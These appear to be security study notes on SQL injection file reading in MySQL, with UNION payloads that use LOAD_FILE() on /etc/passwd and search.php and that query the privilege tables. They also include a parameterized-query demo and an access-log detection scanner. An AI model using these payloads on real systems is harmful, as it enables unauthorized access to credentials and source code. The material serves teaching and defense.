Reading Files

The ability to read files on a server represents a significant security risk. Attackers can exploit SQLi vulnerabilities not only to extract data from databases but also to access sensitive files stored on the server. Whether this is possible usually depends on the privileges assigned to the database user: in MySQL, for instance, the FILE privilege is required to read or write files. By combining SQLi techniques such as UNION queries with functions like LOAD_FILE(), an attacker can potentially read critical system files, application source code, and sensitive information such as database credentials. Understanding this aspect of SQLi is essential for identifying vulnerabilities and implementing effective security measures to safeguard against unauthorized file access.

Overview of SQL Injection

  • SQL Injection (SQLi) can be used not only to extract data from databases but also to read/write files on the server and potentially achieve remote code execution.

User Privileges

  • Reading vs. Writing: Reading data from the database is the common case; reading or writing files on the server is restricted to privileged users to limit what an injection can do.

  • MySQL FILE Privilege: To read/write files, the database user must have the FILE privilege.

  • Determine Current User: Use the following queries to identify the current database user:

    • SELECT USER()

    • SELECT CURRENT_USER()

    • SELECT user FROM mysql.user

  • Example UNION Injection:

    • cn' UNION SELECT 1, user(), 3, 4-- -

    • This shows whether the current user is a DBA account (e.g., root).
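To make the mechanism behind these UNION payloads concrete from the application side, here is an added example (not code from the original notes) that contrasts a search handler built by string concatenation with one that binds the search term as a parameter. It uses an in-memory SQLite database as a stand-in for MySQL, a constructed four-column products table (assumed schema), and the same payload shape as above, with a string literal in place of user() so the injected row is easy to spot.

```python
import sqlite3

# Constructed sample rows standing in for the products table a page like
# search.php would query (assumed schema; not from the original notes).
PRODUCTS = [
    (1, "Apple", "fruit", 1.0),
    (2, "Bacon", "meat", 5.0),
    (3, "Corn", "vegetable", 2.0),
]

# Same shape as the notes' payload: close the string literal, append a UNION with
# the right number of columns, comment out the remainder of the query. The
# marker literal stands in for expressions such as user() or super_priv.
PAYLOAD = "cn' UNION SELECT 1, 'injected-marker', 3, 4-- -"


def make_db():
    """Create the in-memory database and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER, name TEXT, description TEXT, price REAL)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", PRODUCTS)
    return conn


def search_vulnerable(conn, term):
    """String concatenation: the search term becomes part of the SQL text."""
    sql = (
        "SELECT id, name, description, price FROM products "
        f"WHERE name LIKE '%{term}%'"
    )
    return conn.execute(sql).fetchall()


def search_parameterized(conn, term):
    """Bound parameter: the term is data and is never parsed as SQL."""
    sql = "SELECT id, name, description, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def demo():
    """Run both handlers on a normal term and on the payload."""
    conn = make_db()
    return {
        "legit_vulnerable": search_vulnerable(conn, "Ap"),
        "legit_parameterized": search_parameterized(conn, "Ap"),
        # Returns the attacker-controlled row, not a product.
        "payload_vulnerable": search_vulnerable(conn, PAYLOAD),
        # The payload is just an unusual search string: no product matches it.
        "payload_parameterized": search_parameterized(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The parameterized handler is the fix that makes the rest of this page moot for the application: the quote, the UNION and the trailing comment all stay inside the bound value. On the database side, the complementary check is to list accounts holding the FILE privilege (`SELECT user, host FROM mysql.user WHERE File_priv = 'Y'`) and to remove it from the web application's account with `REVOKE FILE ON *.* FROM 'app_user'@'host'` (account name assumed here).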

Checking User Privileges

  • Super Admin Privileges: Check for super admin privileges with:

    • SELECT super_priv FROM mysql.user

  • Example Payload:

    • cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

  • Dumping Privileges: To see all privileges:

    • cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

  • Identifying FILE Privilege: If FILE appears among the privilege types returned, the current user can read and write files on the server.

Reading Files with LOAD_FILE

  • Using LOAD_FILE(): In MySQL/MariaDB this function reads a file from the database host's filesystem and returns its contents as a string; it needs the FILE privilege and returns NULL when the file cannot be read.

    • Example to read /etc/passwd:

      • SELECT LOAD_FILE('/etc/passwd');

  • Example UNION Injection for File Reading:

    • cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

  • Accessing Application Source Code: Attempt to read the source code of search.php:

    • cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -

    • The returned PHP source is rendered into the page by the browser; viewing the page source (Ctrl + U) shows it intact.
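From the defender's side, the payloads in these notes leave distinctive traces in web server access logs. The following is an added example (not part of the original notes) that parses combined-format log lines, URL-decodes the request target, and flags the indicators used above: UNION SELECT, LOAD_FILE(), user()/current_user() probes, and reads of mysql.user or information_schema.user_privileges. The log lines, the IP addresses and the parameter name q are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Combined-log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Indicators drawn from the techniques in these notes, matched against the
# URL-decoded, lower-cased request target.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "load_file": re.compile(r"\bload_file\s*\("),
    "mysql_user_table": re.compile(r"\bmysql\.user\b"),
    "user_privileges": re.compile(r"\binformation_schema\.user_privileges\b"),
    "current_user_probe": re.compile(r"\b(current_user|user)\s*\(\s*\)"),
}

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Oct/2023:13:55:30 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?q=cn%27%20UNION%20SELECT%201%2C%20user()%2C%203%2C%204--%20- HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Oct/2023:13:55:40 +0000] "GET /search.php?q=cn HTTP/1.1" 200 1201 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /search.php?q=cn%27+UNION+SELECT+1%2C+super_priv%2C+3%2C+4+FROM+mysql.user+WHERE+user%3D%22root%22--+- HTTP/1.1" 200 1540 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:15 +0000] "GET /search.php?q=cn%27%20UNION%20SELECT%201%2C%20LOAD_FILE%28%22%2Fetc%2Fpasswd%22%29%2C%203%2C%204--%20- HTTP/1.1" 200 9813 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [10/Oct/2023:13:56:20 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 1198 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:31 +0000] "GET /search.php?q=cn%27+UNION+SELECT+1%2C+grantee%2C+privilege_type%2C+4+FROM+information_schema.user_privileges+WHERE+grantee%3D%22%27root%27%40%27localhost%27%22--+- HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]


def decode_target(target):
    """URL-decode the request target twice (to catch double encoding) and lower-case it."""
    return unquote_plus(unquote_plus(target)).lower()


def scan_line(line):
    """Return a finding dict for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "target": decoded,
        "indicators": hits,
    }


def scan(lines):
    """Scan many lines, keeping only those with at least one indicator."""
    return [f for f in map(scan_line, lines) if f is not None]


def file_read_attempts(findings):
    """Subset of findings whose payload tried to read a file via LOAD_FILE()."""
    return [f for f in findings if "load_file" in f["indicators"]]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["status"], f["indicators"], f["target"])
```

A 200 response on a LOAD_FILE() line with a larger-than-usual response size is the pairing worth alerting on, since it suggests the file contents came back. Decoding before matching matters: the same payload arrives with %20, +, or double-encoded characters, and the raw log text would miss most variants. The indicator list is deliberately tied to the queries on this page; the `union_select` rule alone would also catch the generic UNION-based enumeration that precedes a file read.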

Conclusion

  • SQL Injection can be a powerful tool for accessing sensitive information if proper privileges are not enforced. Understanding user privileges and leveraging functions like LOAD_FILE can expose critical data, including application source code and database credentials. Always ensure robust security measures are in place to mitigate these risks.
